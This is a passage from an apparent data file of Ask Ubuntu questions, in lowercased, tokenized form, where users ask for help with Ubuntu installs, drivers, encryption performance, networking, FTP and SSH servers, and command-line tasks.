game ) disabling the intro video and starting in windowed mode with the launch options of -novid and -sw , respectively . refreshing the steam install ( reinstalling ) by deleting all the files in .local/share/steam except steamapps , steam_bin.sh and steam.sh and launching steam again so that a new steam client will be downloaded and installed after all this i am still getting a crash when i try to launch my games . does anyone know how i can fix this ?
411838	configuring a canon mg5420 in ubuntu ?	my new printer ( 1 month old ) can not be recognized canon pixma mg5420 . the canon site said clearly that it does not work with linux , but i know there are so many experts here that perhaps know some trick to make it works . i 'm very very new in this platform , i 'd appreciate step by step instructions if it is possible .
411840	nexus 7 keeps crashing when sliding edges ?	i 've seen ubuntu touch successfully running on nexus 7 wifi ( 2012 ) , they are able to open an app then slide left/right to either hide the app or to make the launch bar visible . regardless of what i do or what app i run ubuntu freezes when i try to slide either way . is there anyone that can say which version they have used with success for their nexus 7 wifi ( 2012 ) ? currently just using this command to install : phablet-flash ubuntu-system -- channel stable -- bootstrap which installs ubuntu 13.10 ( r101 ) .
411855	ca n't install ubuntu-sdk	i ca n't install ubuntu sdk : alexis @ lola : ~ $ sudo apt-get install ubuntu-sdk reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : ubuntu-sdk : depends : ubuntu-sdk-libs-dev but it is not going to be installed . e : unable to correct problems , you have held broken packages . can help me ? sudo apt-get check alexis @ lola : ~ $ sudo apt-get check leyendo lista de paquetes ... hecho creando 谩rbol de dependencias leyendo la informaci贸n de estado ... hecho alexis @ lola : ~ $ cat /etc/apt/sources.list { , ..d/* } alexis @ lola : ~ $ cat /etc/apt/sources.list { , ..d/* } # deb cdrom : [ ubuntu 13.04 _raring ringtail_ - release i386 ( 20130424 ) ] / raring main restricted # see http : //help.ubuntu.com/community/upgradenotes for how to upgrade to # newer versions of the distribution . deb http : //archive.ubuntu.com/ubuntu saucy main restricted deb-src http : //archive.ubuntu.com/ubuntu saucy main restricted # # major bug fix updates produced after the final release of the # # distribution . deb http : //archive.ubuntu.com/ubuntu saucy-updates main restricted deb-src http : //archive.ubuntu.com/ubuntu saucy-updates main restricted # # n.b . software from this repository is entirely unsupported by the ubuntu # # team . also , please note that software in universe will not receive any # # review or updates from the ubuntu security team . deb http : //archive.ubuntu.com/ubuntu saucy universe deb-src http : //archive.ubuntu.com/ubuntu saucy universe deb http : //archive.ubuntu.com/ubuntu saucy-updates universe deb-src http : //archive.ubuntu.com/ubuntu saucy-updates universe # # n.b . software from this repository is entirely unsupported by the ubuntu # # team , and may not be under a free licence . please satisfy yourself as to # # your rights to use the software . also , please note that software in # # multiverse will not receive any review or updates from the ubuntu # # security team . deb http : //archive.ubuntu.com/ubuntu saucy multiverse deb-src http : //archive.ubuntu.com/ubuntu saucy multiverse deb http : //archive.ubuntu.com/ubuntu saucy-updates multiverse deb-src http : //archive.ubuntu.com/ubuntu saucy-updates multiverse # # n.b . software from this repository may not have been tested as # # extensively as that contained in the main release , although it includes # # newer versions of some applications which may provide useful features . # # also , please note that software in backports will not receive any review # # or updates from the ubuntu security team . deb http : //archive.ubuntu.com/ubuntu saucy-backports main restricted universe multiverse deb-src http : //archive.ubuntu.com/ubuntu saucy-backports main restricted universe multiverse deb http : //archive.ubuntu.com/ubuntu saucy-security main restricted deb-src http : //archive.ubuntu.com/ubuntu saucy-security main restricted deb http : //archive.ubuntu.com/ubuntu saucy-security universe deb-src http : //archive.ubuntu.com/ubuntu saucy-security universe deb http : //archive.ubuntu.com/ubuntu saucy-security multiverse deb-src http : //archive.ubuntu.com/ubuntu saucy-security multiverse # # uncomment the following two lines to add software from canonical's # # 'partner ' repository . # # this software is not part of ubuntu , but is offered by canonical and the # # respective vendors as a service to ubuntu users . deb http : //archive.canonical.com/ubuntu saucy partner deb-src http : //archive.canonical.com/ubuntu saucy partner # # this software is not part of ubuntu , but is offered by third-party # # developers who want to ship their latest software . deb http : //extras.ubuntu.com/ubuntu saucy main deb-src http : //extras.ubuntu.com/ubuntu saucy main cat : /etc/apt/sources.list..d/* : no existe el archivo o el directorio
411861	lego star wars ii setup.exe wine install failed	i was trying to install lego star wars ii through wine . when i popped the disc into my drive , wine did n't kick in , so i went into its root directory an ran the setup.exe file . it let me pick my language , and then it started installing . after a minute , i got the following error message : 1628 : failed to complete installation my distro is ubuntu 12.04 lts .
411865	terrible luks/dm-crypt performance on 13.10 ( asus zenbook , ssd , aes-ni supported )	i have a laptop ( asus zenbook ux31a ) with 124gb ssd . i installed ubuntu on a encrypted partition and started facing moments of temporary or permanent unresponsiveness . i suspected i/o and did some benchmarks . disk writes seem to be terribly slow : ➜ ~ dd if=/dev/zero of=tempfile bs=1m count=200 conv=fdatasync , notrunc 200+0 records in 200+0 records out 209715200 bytes ( 210 mb ) copied , 8.2222 s , 25.5 mb/s reads look ok ➜ ~ echo 3 > /proc/sys/vm/drop_caches ➜ ~ dd if=tempfile of=/dev/null bs=1m count=200 200+0 records in 200+0 records out 209715200 bytes ( 210 mb ) copied , 0.9317 s , 225 mb/s i was checking htop and iotop while performing writes and noticed no significant increase in cpu load . iotop 's `` actual disk write '' showed ~200mb/s for a short period of time and immediately dropped back to 0 ( write dd was running for few more seconds after that ) . i have intel i7-3517u cpu , which supports aes-ni , which is also enabled in bios . aes-ni kernel modules seem to be enabled : ➜ ~ lsmod | grep aes aesni_intel 55624 376 aes_x86_64 17131 1 aesni_intel lrw 13286 5 serpent_sse2_x86_64 , aesni_intel , serpent_avx_x86_64 , twofish_avx_x86_64 , twofish_x86_64_3way glue_helper 13990 5 serpent_sse2_x86_64 , aesni_intel , serpent_avx_x86_64 , twofish_avx_x86_64 , twofish_x86_64_3way ablk_helper 13597 4 serpent_sse2_x86_64 , aesni_intel , serpent_avx_x86_64 , twofish_avx_x86_64 cryptd 20359 190 ghash_clmulni_intel , aesni_intel , ablk_helper cryptsetup benchmarks also looks ok : ➜ ~ ./workspace/cryptsetup-1.6.1/src/cryptsetup benchmark # tests are approximate using memory only ( no storage io ) . pbkdf2-sha1 433295 iterations per second pbkdf2-sha256 254508 iterations per second pbkdf2-sha512 154021 iterations per second pbkdf2-ripemd160 347671 iterations per second pbkdf2-whirlpool 184608 iterations per second # algorithm | key | encryption | decryption aes-cbc 128b 516.9 mib/s 1894.4 mib/s serpent-cbc 128b 72.8 mib/s 251.0 mib/s twofish-cbc 128b 156.1 mib/s 284.7 mib/s aes-cbc 256b 368.2 mib/s 1379.8 mib/s serpent-cbc 256b 75.3 mib/s 243.3 mib/s twofish-cbc 256b 157.7 mib/s 292.7 mib/s aes-xts 256b 2376.0 mib/s 3503.0 mib/s serpent-xts 256b 307.7 mib/s 264.2 mib/s twofish-xts 256b 340.7 mib/s 345.7 mib/s aes-xts 512b 4548.0 mib/s 4527.0 mib/s serpent-xts 512b 315.1 mib/s 265.0 mib/s twofish-xts 512b 327.7 mib/s 328.7 mib/s cryptsetup status : ➜ ~ sudo cryptsetup status sda3_crypt /dev/mapper/sda3_crypt is active and is in use . type : luks1 cipher : aes-xts-plain64 keysize : 512 bits device : /dev/sda3 offset : 4096 sectors size : 241291264 sectors mode : read/write ssd is sandisk u100 : ➜ ~ sudo lshw ... *-scsi:0 physical id : 1 logical name : scsi0 capabilities : emulated *-disk description : ata disk product : sandisk ssd u100 physical id : 0.0.0 bus info : scsi @ 0:0.0.0 logical name : /dev/sda version : 10.5 serial : 122300414449 size : 115gib ( 124gb ) capabilities : gpt-1.00 partitioned partitioned : gpt configuration : ansiversion=5 guid=462c7bc0-c895-4486-a0de-9911664bdbf8 sectorsize=512 *-volume:0 description : windows fat volume vendor : mkdosfs physical id : 1 bus info : scsi @ 0:0.0.0,1 logical name : /dev/sda1 logical name : /boot/efi version : fat32 serial : f767-aca8 size : 189mib capacity : 189mib capabilities : boot fat initialized configuration : fats=2 filesystem=fat mount.fstype=vfat mount.options=rw , noatime , nodiratime , fmask=0022 , dmask=0022 , codepage=437 , iocharset=iso8859-1 , shortname=mixed , errors=remount-ro state=mounted *-volume:1 description : data partition vendor : linux physical id : 2 bus info : scsi @ 0:0.0.0,2 logical name : /dev/sda2 logical name : /boot version : 1.0 serial : 196c3925-113a-465a-b73e-b3506bf86401 size : 244mib capabilities : ext2 initialized configuration : filesystem=ext2 modified=2014-01-28 00:30:04 mount.fstype=ext2 mount.options=rw , noatime , nodiratime , errors=continue state=mounted *-volume:2 description : data partition vendor : windows physical id : 3 bus info : scsi @ 0:0.0.0,3 logical name : /dev/sda3 serial : 4e2be2b7-d729-4e1f-912a-319533fa4e4b size : 115gib capacity : 115gib width : 512 bits capabilities : encrypted luks initialized configuration : bits=512 cipher=aes filesystem=luks hash=sha1 mode=xts-plain64 version=1 thank you !
411868	please tell me correct way to use usb_modeswitch in ubuntu saucy	i have one mobile router `` hw0-2e '' . ( https : //www.nttdocomo.co.jp/product/data/hw02e/index.html ) ( japanese only ) i want to use this by usb connection as my pc is desktop and no wifi . i know this one can connect with windows pc by usb connection . but if i connect it with ubuntu , my pc can not identify it as usb modem , my pc identifies it as cd . so i think , if i install usb_modeswitch to ubuntu , i will use it . then , i installed it to ubuntu saucy , and i searched vendorid=12d1 , productid=1506 and read http : //www.draisberghof.de/usb_modeswitch/bb/viewtopic.php ? t=708 and tried a lot of things . but i can not use `` hw0-2e '' as router . please tell me correct way to use usb_modeswitch in ubuntu saucy .
411869	ubunu one for windows locks files ; how can i stop this ?	i have been having problems with ubuntu one on windows locking files that i 'm editing making it impossible for me to save them with an overwrite function . i always end up having to save as a new file name . i have even had problems with the save as function while the ubuntu one client is running . sometimes it will not let me save as to a new file name , or if it does , the changes are not in the file . if i exit the ubuntu one client , there is no more problem with saving files as usual with overwrite . this occurs with powerpoint files , excel files , and word files . has anyone else encountered this problem and does anyone have a fix for it ? i just did some further testing . if i `` disconnect '' in the ubuntu one client , then the problems with file locks also appear to go away . is it that the app is designed for me to control when the file sync is connected and disconnected ? is that how i am supposed to be using it ? or is it designed that i can leave it `` connected '' all the time and the file locks are not supposed to be happening ?
411870	how to deny an ip address from connecting to my system ?	is there a way to deny an ip address from connecting to my pc ? is there a way to deny an ip from connecting to specific port ?
411873	how do i make my native windows 8 lenovo laptop boot grub ?	i like to think i 'm not a novice on this issue but this situation is proving me wrong . i 've been trying for about two days to figure out a way for my lenovo s415 to install ubuntu . i have disabled secureboot , turned on legacy support , and i have gotten it to the point of having the usb appear in the list of boot options . but when i do try , it says missing operating system and kicks back over to the main windows boot controller . i can not even get grub to appear at all . i do n't think it 's a problem with the flash drive ; i 've tried every usb creator more than once and it solves nothing . the bios settings are changed to everything that seems reasonable . i want to completely wipe the drive and replace it with ubuntu . i do n't care about keeping windows on here . if all else fails , i have another computer here to use and i do n't care if i have to wipe this one in the process . how would i install ubuntu from scratch ? it 's been a long two days and i greatly appreciate the help !
411876	how to enable iptables in ubuntu	i am trying to use iptables in my ubuntu with 3.12 kernel . i got following error when trying iptables -l. bill @ bill : /usr/lib $ sudo iptables -l error : could not insert 'ip_tables ' : exec format error iptables v1.4.18 : ca n't initialize iptables table `filter ' : table does not exist ( do you need to insmod ? ) perhaps iptables or your kernel needs to be upgraded . then i tried following command , bill @ bill : /usr/lib $ sudo modprobe ip_tables error : could not insert 'ip_tables ' : exec format error then i tried following : bill @ bill : /usr/lib $ grep -i iptables /boot/config-`uname -r` config_ip_nf_iptables=m config_ip6_nf_iptables=m # iptables trigger is under netfilter config ( led target ) can anybody tell me how can i enable iptables ?
411877	unable to locate package friends-app	would appreciate the help $ sudo apt-get install friends-app reading package lists ... done building dependency tree reading state information ... done e : unable to locate package friends-app
411879	how i can install ubuntu alongside other 3 os ?	i have to create a triple boot system , using windows , macintosh and linux together but in different partitions . for this i shared my 1tb hard disk in four partitions but i do n't know what does not go well and after the linux ubuntu 13.10 installation i ca n't get in on windows . also , i 'm not sure if i used the correct format or i what are the correct steps to complete the installation . i remember that somewhere the linux ubuntu installer asks me what format i have to choose for the linux partition and before the starting asks me , something about swap but i do n't know what is the swap and what exactly does . so , i need your help to install the linux ubuntu on the third partition without to lose the windows partition .
411882	dual boot windows 8 and ubuntu 13.10 on lenovo g510	i recently got a lenovo g510 laptop with windows 8 pre loaded . i wanted to dual boot ubuntu with this windows and was stuck at trying to understand secure boot . right now i know of these steps to install ubuntu along side windows with uefi disabled . pls let me know if i 'm wrong or any other way to setup disable secure boot in bios disable fast boot in windows boot ubuntu installer using usb , partition as required without deleting windows select the drive for grub loader ? ? not sure what to select here . thanks arjun
411884	how can i get this rtl8812au driver working on 13.10 for my trendnet tew-805ub ?	i have one post on compiling the driver , they suggested another question on installing it and getting it working . link to compiling post . the way on github doesnt work . so can anyone help with what i do next ?
411885	system freezes when connecting new external hard drive	i am logged in as root at the command line prompt . i have this new 4tb western digital my book studio usb2.0/3.0 external hard drive which i intend to use as backup storage . i tried plugging it in but this is what i get : [ 325053.885636 ] sd 10:0:0:0 : [ sdg ] no caching mode page present [ 325053.887454 ] sd 10:0:0:0 : [ sdg ] assuming drive cache : write through [ 325053.894273 ] sd 10:0:0:0 : [ sdg ] no caching mode page present [ 325053.896423 ] sd 10:0:0:0 : [ sdg ] assuming drive cache : write through [ 325053.953886 ] sd 10:0:0:0 : [ sdg ] no caching mode page present [ 325053.955547 ] sd 10:0:0:0 : [ sdg ] assuming drive cache : write through _ it remained stuck there for more than 15 min . so i pressed ctrl+c to abort . sdg shows up fine in lsblk with two partitions sdg1 ( 200m ) and sdg2 ( 1.7t ) and does not appear to be mounted , and the usb device appears in lsusb , so it 's connected and the system knows it . fdisk -l gives me this : disk /dev/sdg : 4000.8 gb , 4000752599040 bytes 255 heads , 63 sectors/track , 486397 cylinders , total 7813969920 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x00000000 device boot start end blocks id system /dev/sdg1 1 4294967288 2147483644 ee gpt partition 1 does not start on physical sector boundary . i have two questions : ( 1 ) is it ok for me to proceed with ext3 formatting and manual mounting ? ( 2 ) why did the system hang after i connected the external drive and what is the problem with the physical sector boundary ? just wanting to make sure i 'm not missing out on anything important , and taking the opportunity to learn .
411886	can my laptop handle kubuntu ?	i would like to know if my laptop can handle kubuntu . if not , what are my options ? the informations about my laptop : windows xp , version 2002 intel ( r ) core ( tm ) 2 duo cpu or mobile intel ( r ) 965 express chipset family t5670 @ 1.80ghz 789 mhx , 0.99gb of ram physical address extension thank you in advance , adam
411888	ubuntu 12.04 ocasionally freezes on startup ?	i have installed ubuntu 12.04 a couple of months ago when in my computer was still installed windows 7 ; i ran them for a while , then i deleted the used memory to contain windows . i have been quiet pleased by the performance of this free software . however , i have been having problems when it comes to turn my laptop on having turned it off in the hibernation way . what i try to say it is that sometimes it starts just alright , and in a few other ones it does not . ( hibernation mode ) when it freezes up , the cursor does not move . the initial screen , the purple one , with the option recovery , the usual startup , and so forth show up , then it continuous till it gets to the login screen . i then can not do anything either . what i do is just to press and maintain the on/off button , so it is dramatically forced to shut down . when i turn it on again , surprisingly the letters appear on the screen in an unusual size , they are quiete big , so i restart it ( because just then i am able to have the control of the machine ) . and , finally , it works . what can it be ? any solution ? please hep me , and off course , thanks in advance
411889	internet connection problem after closing and reopening laptop	i 've recently installed ubuntu 13.10 . frequently , after i close and re-open my laptop , i am unable to connect to the internet . no networks are even listed , wifi or lan , even when i have the ethernet cable plugged in . the only fix i have is to restart the computer . what can i do to make my laptop reconnect automatically after it is reopened ? i am not great with computers , so some explanation would be greatly appreciated .
411890	unsupported graphic for installation on toshiba u50d	i have a toshiba satellite u50d laptop ( a6-5200 with radeon 8400 graphic ) . when i try to install ubuntu ( 12.04 lts or 13.10 ) via usb , it goes to the text mode and not into the graphic mode for installation . any idea how i can get it working ?
411891	dolphin thumbnail did n't show	i 've changed my unity default file manager to dolphin like this sudo mv /usr/bin/nautilus /usr/bin/nautilus.asli & & sudo ln -s /usr/bin/dolphin /usr/bin/nautilus but , video thumbnails did n't show up , can anyone help p.s . in nautilus all thumbnails are shown
411892	thunderbird new mail notification pop up xubuntu 13.10	i just started using xubuntu and i have been pretty impressed so far . i use thunderbird as my e-mail client and i have been having a tough time getting the email notifications to show up again . they used to show up and then i played with it ... . i was playing with the panels and i deleted the panel that comes installed at the top and put a new one in . now i do n't get the transparent box in the corner indicating new mail ( i do get the transparent box showing the wifi network i am connected to and when my battery is fully charged and that i can use guake ) . i put the notification area plug-in in and did not see any options for thunderbird . there is also a indicator plug-in but it does not have any options . i really want that box to show up again indicating that i have a new message because i like to have my docks hidden for more screen real estate . any help would be appreciated . most of the forums that i have read on the subject seem to deal with the sound or unity , neither of which interest me .
411895	why chrome plug-ins does n't load automatically ?	it 's the third day to use ubuntu . ( almost ) everything is great , but why my chromium-browser plugins did n't load automatically as in windows ( r ) after booting ? environment : ubuntu 12.04 lts / chromium-browser 31.0.1650.63 how to solve this problem ? ps . the chromium-browser plugins in ubuntu 13.10 can be automatically loaded after booting .
411897	how do i get my asus laptop to start at the right brightness level ?	i want to make it so my laptop starts at a low brightness level , which is comfortable for my eyes and easy on the laptop 's battery . i found some instructions here on askubuntu , and so by using this command : cat /sys/class/backlight/intel_backlight/brightness ... i discovered that the maximum brightness is 4080 and the ideal brightness that i want to have my laptop default to is 700 . so , i edited my /etc/rc.local file to have the following line in it : echo 700 > /sys/class/backlight/acpi_video0/brightness however , that did n't work . so , after a little more research , i tried this line : echo 700 > /sys/class/backlight/intel_backlight/brightness but that also changed nothing . now i 'm a bit stuck . how do i get my brightness to start at the right level when i log in on my laptop ? note : it seems that this problem may be made worse by another more general issue of commands not running at startup , which i 've asked about in a separate question . i think some of the answers suggested so far may actually work in principle , but i ca n't verify any of them unless i 'm sure my startup programs are executing at all .
411898	text editor to handle extremly large files	i generated 300mb text file , trying to edit it using sublime 3 on xubuntu 13.10 64 bit , it 's so slow and crashing , i 'm not a vim/vi user , what is the best editor to work with these kind of files . i only need to search , and remove duplicate .
411899	athentication password for updateing ubuntu	when i downloaded ubuntu 12.4 it did not include wi-fi so i was told to go to updates and there is the download for wireless internet . i was trying to update the wireless internet but it needs a authentication password . what do i do where is this password located ? i tried my password for the computer and just hitting enter also i have tried putting my name . if there is any thing u could tell me that would be awesome .
411900	install ubuntu on windows mobile ( lumia 710 )	i always wondered if i could use ubuntu on my android devices and now finally it is possible , great . as it is human wants , now i want to know if it 's possible to install the ubuntu on nokia lumia devices , like nokia 710 . the devices come with windows os ... .
411902	issues with running ardesia on lubuntu 13.10/14.04	i am trying to achieve the setup described by roman in this thread : drawing over the desktop ( i 'm trying option 2 , using ardesia with xcompmgr ) i really could use this solution to make instructional videos for my chemistry class ( i 'm a teacher ) . i have installed xcompmgr and ardesia ( according to roman 's solution ) , but when i run ardesia i get a blank grey toolbar ( without the icons showing that are supposed to be there ) . the buttons on the toolbar -- although not visible -- do work ( the pen cursor shows up when i click pencil , the colors change properly , etc . ) , but nothing happens when i try to write anything . i have also tried using compton instead of xcompmgr . i am running lubuntu 13.10 [ update : 14.04 ] . any suggestions would be greatly appreciated , as this would really be a killer tool for making videos for my class . thanks . [ update ] : upon further investigation , others seem to be having this issue with the latest version of ardesia ( 1.1-1 ) , and recommended trying the penultimate verison ( 1.0-1 ) . i tried this , and while it gives slightly better results ( the toolbar icons show up , annotating with text works but disappears after a few seconds , pen drawing is still impossible ) , this is still far from being usable . i 'd still appreciate any help . thank you . [ update 2 ] : as a test , i ran a **u**buntu ( not **lu**buntu ) live cd , installed ardesia on it , and ran it using compiz . this worked perfectly , but i have no interest in making the switch to ubuntu . so , i then tried installing compiz on my lubuntu system and using that with ardesia , but achieved the same failing results . still trying to figure out what the issue might be ( perhaps a problem with openbox ? ) . i 'm really no expert here , but i 'm trying anything i can , and i 'd really love any help that people could provide . thank you . [ update 3 ] : upon trying the suggestion in the comments by @ fossfreedom , i got the following error from ardesia : i then tried it a few more times , and i got it to not break down once , but it still would n't draw . perhaps of note : sometimes when i quit aredsia , the drawing that i tried to do flashes briefly before the program closes . not sure what this could mean , but i think it shows that it 's not totally broken ...
411903	why does n't ubuntu install applications similar to mac ?	i used a macbook a little while ago and was quite amazed at how easy it was to install applications . this method seemed easier to use than both windows and all other unix based operating systems i 've ever used . dragging a file into an install folder is about as easy as it gets . i do like the idea behind the ubuntu software center - but due to it almost always being out of date , it 's usefulness is quite limited . the functionality of apt-get is quite good as far as things go , but it 's command line interface is quite unusable for non tech-savy users .
411905	why lxsession-logout slows down x window system ?	in lubuntu , if you click on the shutdown button , the one to the right on the panel ; the whole window system slows down and any click you make takes more than 20 seconds to complete . from around the web it seems like this is a problem with the drivers for amd cards , however i ca n't state it as a fact . i 'm using a sapphire hd 7770 .
411907	dropbox ( different ) installation error in ubuntu 12.04	when trying to install dropbox from terminal ( using how to install dropbox ? guide ) , and trying to install the repository key i get the following : ~ $ sudo apt-key adv -- keyserver pgp.mit.edu -- recv-keys 5044912e executing : gpg -- ignore-time-conflict -- no-options -- no-default-keyring -- secret-keyring /tmp/tmp.0a2b16zrzs -- trustdb-name /etc/apt/trustdb.gpg -- keyring /etc/apt/trusted.gpg -- primary-keyring /etc/apt/trusted.gpg -- keyserver pgp.mit.edu -- recv-keys 5044912e gpg : requesting key 5044912e from hkp server pgp.mit.edu gpgkeys : key 5044912e not found on keyserver gpg : no valid openpgp data found . gpg : total number processed : 0 even when i try to just install dropbox itself : $ cd ~ & & wget -o - `` http : //www.dropbox.com/download ? plat=lnx.x86_64 '' | tar xzf - -- 2014-01-28 14:12:27 -- http : //www.dropbox.com/download ? plat=lnx.x86_64 resolving < proxy > ( < proxy > ) ... xxx.xxx.xxx connecting to < proxy > ( < proxy > ) |xxx.xxx.xxx|:8080 ... connected . proxy request sent , awaiting response ... 407 proxy authentication required 2014-01-28 14:12:27 error 407 : proxy authentication required . gzip : stdin : unexpected end of file tar : child returned status 1 tar : error is not recoverable : exiting now however , this should not be a proxy problem as other machines seem to be able to overcome the proxy problem and the software center can install it ( but then i can not get the key ) . any suggestions ?
411911	no files & applications tab in security and privacy	i tried to post a picture but i have no reputation , but at any rate i have no `` files & applications '' tab in `` security & privacy '' . i think i messed around with something to clear the unity dash history a while back but i do n't remember what . any ideas ? i think this is causing me issues in other parts of my life such as not being able to lock and unlock apps from the launcher , because i have no zeitgeist/activity.sqlite file . thank you for any help i can get . i 'm running 13.10
411913	system stalled in middle of upgrade to 13.10	now that an upgrade is in process the window indicating what stages are occurring with check-boxs is shadowed over and stuck in preparing to configure desktop . does it normally stay at this stage without the orange status bar creeping forward at all ? it has been stuck in one spot for about 30 mins .
411914	how to restore python to its default on ubuntu 13.10	i 'm using ubuntu 13.10 . i was trying to finish a project using python 2.7 , so that i installed python version 2.7.6 into my system . but now my system is not functioning properly & some apps are n't working . how do i go back and restore the python to its default ?
411918	ubuntu wont recognice usb devices	i 've been using ubuntu for a while , and i 've been using my mouse and my dac perfectly , but i reinstalled ubuntu and now it recogniุณes my oendriver but not my mouse and my dac , what should i do ? i 'm running a hp pavilion g6 amd edition , note : i used to have a 64 bit version and now i have a 32 bit ...
411921	what is the default window title font in ubuntu desktop ?	i have installed unity in my ubuntu gnome installation and using unity tweak tool to customize . what is the default window title font in unity ? ( i have changed everything else )
411925	unable to use/type letter `` d '' within terminal on ubuntu 13.10	while typing the command `` gedit '' or `` cd '' or any word which assosicates with the letter `` d '' , it wont come on the screen . same issue raises while doing a copy paste to the terminal . e.g . : if i copy the following : cd desktop and paste it in the terminal , it becomes c desktop . this happens only in the terminal window but i 'm able to type on other windows such as notepad , documents.. etc . how can i solve it ?
411926	what combination of nvidia drivers and kernel version is recommended for gaming ?	i 'm somewhat new to linux , although i have a fair amount of experience . i 've been having a lot of graphical issues lately , and figured that upgrading to the latest linux kernel and nvidia drivers would help . i was wrong . when i tried to install version 331.38 of my drivers , i got an error pertaining to the kernel . i 'm currently using version 3.13.0-031300-generic , and the default nvidia drivers since i could n't properly install the new ones . should i continue with new ones or try a different combination . note that the `` out of the box '' kernel/drivers caused many crashes and freezes , especially while gaming .
411927	how to make firefox use native notification ( notify-osd ) ?	i 've seen this : as you can see firefox is using the ubuntu notification to notify the user . how to do that ? i just want to get notifications for anything in general : for example , if a download is completed ... firefox version 26.0
411928	ubuntu ( 12.04 ) system hangs on login	ok , so i installed ubuntu 12.04 on a dell xps series ( windows 7 ) laptop using wubi . there were no problems with the installation , but when i tried to run it , it displays the login screen but will not accept any input and there is no error message . the only way out is to power down the system and reboot under windows . is this a bug or did i do something wrong when i installed it ? thanks , anna
411931	asus 1015e-cy041d booting issue with removal disk	i got asus 1015e-cy041d with ms-dos . by default bios does n't have removal disk option . how i can add removal disk option and start my booting from removal disk ? ?
411935	how to run a script directly when double clicked ?	to execute a script , i have to : write the script make it executable double click it , which shows this window : click the `` run '' button . how can i execute the script directly , without showing the dialog ?
411938	efibootmgr install failure - how to fix dependencies ?	i 'm trying to get rid of an extraneous/fake `` ubuntu '' uefi boot option ( per this thread ) . i am running a ubuntu 12.04.3 live usb created using windows unetbootin tool . when i attempt sudo efibootmgr -v , i get `` command not found '' error . so , i try sudo apt-get install efibootmgr and i get the following result : reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : efibootmgr : depends : libpci3 ( > = 1:3.1.9-2 ) but 1:3.1.8-2ubuntu5 is to be installed e : unable to correct problems , you have held broken packages . how can i get efibootmgr to install & run , or is there another way to remove the ghost boot option ? if it matters : gigabyte ga-z77n-wifi mobo
411940	installing ubuntu on mac pro black cylinder fails	i just got the new mac pro black cylinder with amd d700 gpu and i 'm not able to finalize the ubuntu install . i followed the steps from your instructions `` how to create a bootable usb stick on os x '' from here : http : //www.ubuntu.com/download/desktop/create-a-usb-stick-on-mac-osx and all of that goes well , i boot up and see the boot menu , then i select option 1 ) and i get the following : kernel path : /casper/vmlinuz | ramdisc path : /casper/initrd.lz boot parameters : loading linux kernel ... done loading initial ram disc ... done attempting to boot the linux distribution now ... error : no suitable video mode found . booting in blind mode then after a few seconds the mac reboots itself and that 's the end of it . have you seen this error before ? is it the gpu hardware drivers that are n't compatible ? i used ubuntu-13.10-desktop-amd64.iso thanks a lot , alejandro
411946	how to change areabottomedge without using xinput	just as i can change softbuttonareas using xinput without having to edit xorg.conf , i want to be able to change areabottomedge . when i list properties using xinput , it is not available , but it is available in xorg.conf . how can i access this property using xinput ?
411947	i have 2 ftp servers running	i have installed vsftpd but when i turn it off , i can still access my ftp user how can i find the other ftpd and remove it -viktor strate
411948	how to change directory to a local drive ..in terminal ?	i am a new linux ubuntu user . i want to save my c++ programs in a local drive . i know how to change directory and mkdir in terminal but i do n't know how to switch local drives .
411950	ubuntu builder desktop not appearing	whenever desktop is opened it shows dialogue saying '' could not acquire name on session bus '' logout please help .
411954	could n't able to download file from vsftpd server	i have installed and configured vsftpd server on my system ( ubuntu 12.04 ) , followed these pages for setup and configuration ftp server . i can able to see my files at $ ftp : //192.xx.xx.xx but the problem is , i can not able to download them . i have uploaded one pdf file at /home/ftp directory and just for testing purpose when i try to click on it for downloading from browser it is showing '' the web page is not available ''
411955	ssh refusing connection after changing default port	currently i 'm handling 2 server ( a and b ) . in server a i installed ubuntu 12.10 . i changed the ssh port into 1198 and it works fine . in server b it has been installed with ubuntu 11.04 . i tried to change the port number into 1198 as well but it refused the connection when i tried to connect again using putty . i change the ssh configuration on /etc/ssh/sshd_config and i did restart the ssh using sudo service ssh restart . i was thinking its because of firewall allowed port but the firewall shows inactive when i run sudo ufw status . any idea why this can happened ?
411958	swap taking more ram memory , my system running slow	when i give the command 'free -g ' and view the output , it says total used free shared buffers cached mem : 1 1 0 0 0 0 -/+ buffers/cache : 1 0 swap : 3 0 3 my swap is taking 3 gb of ram . and my system is running very slow because of this . please let me know : how do i reduce swap using 3gb of my ram ?
411961	mysql server in ubuntu 13.04 not showing databases	i have installed xampp ( lampp ) in ubuntu 13.04 . i have secured the xampp phpmyadmin mysql ftp . status showing activated.now , i have installed mysql server.in terminal write mysql -u root -p and then password and i connect with my mysql commandline . now show databases ; i can only see information_chema , performance_schema and test mysql and also showing db ( abc ) the created databases from the terminal command line . i can drop this 'abc ' database from terminal but abc is not showing in phpmyadmin.and databse created in phpmyadmin not showing in terminal with show databses ; . also could not drop databases from phpmyadmin drop database statements are disabled allowing me to create only . thnks for any help .
411964	detecting if my server have band width limitation ?	i have some ubuntu 12.04 server in a range ip address . i have problem with one of them on downloading from internet , although other ones do it by high speed . how can i detect the problem ? if there is any band width limitations or anything else ?
411965	command to list the largest 3 directories/files in my home	how can i list the largest 3 directories/files which are directly ( not recursive ) in my home directory using a command ?
411970	ubuntu 12.04 keyring broken `` ca n't log into account ''	so , for some reason i cant suddenly log into my main account , so i did alt+ctrl+f1 and saw the message `` signature not found in user keyring perhaps try the interactive 'ecryptfs-mount-private ' ''
411971	command to split a text file according to number of lines	the situation : i have a text file which is about 1.5gb containing about 4000000 lines . i want to import this to libreoffice calc and as u know you ca n't import this huge file with large number of lines ( i think maximum is 65000 line ) . anyway what i need is a simple command that can split this file into smaller files with number of lines in each file < 65000 line .
